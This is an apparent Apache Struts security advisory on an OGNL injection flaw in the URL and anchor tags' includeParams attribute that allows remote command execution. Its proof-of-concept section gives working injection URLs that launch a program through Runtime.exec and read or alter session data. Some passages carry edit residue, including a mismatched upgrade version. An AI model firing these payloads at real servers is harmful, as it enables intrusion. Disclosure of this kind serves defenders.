...
Excerpt |
---|
A vulnerability introduced by forcing parameter inclusion in the URL and Anchor Tag allows remote command execution, session access and manipulation and XSS attacks |
Who should read this | All Struts 2 developers |
---|---|
Impact of vulnerability | Remote command execution, remote server context manipulation, injection of malicious client side code |
Maximum security rating | Highly Critical |
Recommendation | Developers should immediately upgrade to Struts 2.3.14.2 |
Affected Software | Struts 2.0.0 - Struts 2.3.14.1 |
Reporter | Eric Kobrin and Douglas Rodrigues (Akamai), NSFOCUS Security Team |
CVE Identifier |
Problem
Both the s:url and s:a tag provide an includeParams attribute.
...
The second evaluation happens when the URL/A tag tries to resolve every parameters present in the original request.
This lets malicious users put arbitrary OGNL statements into any request parameter (not necessarily managed by the code) and have it evaluated as an OGNL expression to enable method execution and execute arbitrary methods, bypassing Struts and OGNL library protections.
The issue was originally addressed by Struts 2.3.14.1 and Security Announcement S2-013. However, the solution introduced with 2.3.14.1 did not address all possible attack vectors, such that every version of Struts 2 before 2.3.14.2 is still vulnerable to such attacks.
Proof of concept
- Open HelloWorld.jsp present in the Struts Blank App and add to one of the url/a tag the following parameter:
Such that the line will be something look like this:Code Block includeParams="all"
(it works also with includeParams="get").Code Block xml xml <s:url id="url" action="HelloWorld" includeParams="all">
- Run struts2-blank app
- Open the following url, resulting in calc application opening on Windows (try ....exec('open%20.')} to open a Finder window on Mac OS):
fakeParamCode Block http://localhost:8080/struts2-blank/example/HelloWorld.action?
%25%7B(%23_memberAccess%5B'allowStaticMethodAccess'%5D%3Dtrue)(%23context%5B'xwork.MethodAccessor.denyMethodExecution'%5D%3Dfalse)(%23writer%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23writer.println('hacked')%2C%23writer.close())%7Daaa=
(this is the shortened version http://goo.gl/lhlTl)1${%23_memberAccess[%22allowStaticMethodAccess%22]=true,@java.lang.Runtime@getRuntime().exec('calc')}
- Open the following url to modify session content:
Code Block http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]='true'}
- Open the following url to print out session content and in combination with the previous example introduce arbitrary code into the resulting HTML output:
Code Block http://localhost:8080/struts2-blank/example/HelloWorld.action?aaa=1${%23session[%22hacked%22]}
As you will notice, in this case, there is no way to escape/sanitize the fakeParammalicious parameter, since it's not an expected parameter and even will not get evaluated the request parameters are processed.
Solution
The OGNLUtil class URL rendering subsystem was changed to deny eval expressions by defaultto not pass any parameter name or value to OGNL evaluation.
The MemberAccess component's allowStaticMethodAccess property is now immutable.
Note | |||
---|---|---|---|
| |||
In case you need to restore the old behavior, you need to define the following constant, inside your struts configuration (use it at your own risk). Code Block | | xml | xml | <constant name="struts.ognl.enableOGNLEvalExpression" value="true" />
Warning |
---|
It is strongly recommended to upgrade to Struts 2.3.14.12, which contains the corrected OGNL and XWork library. |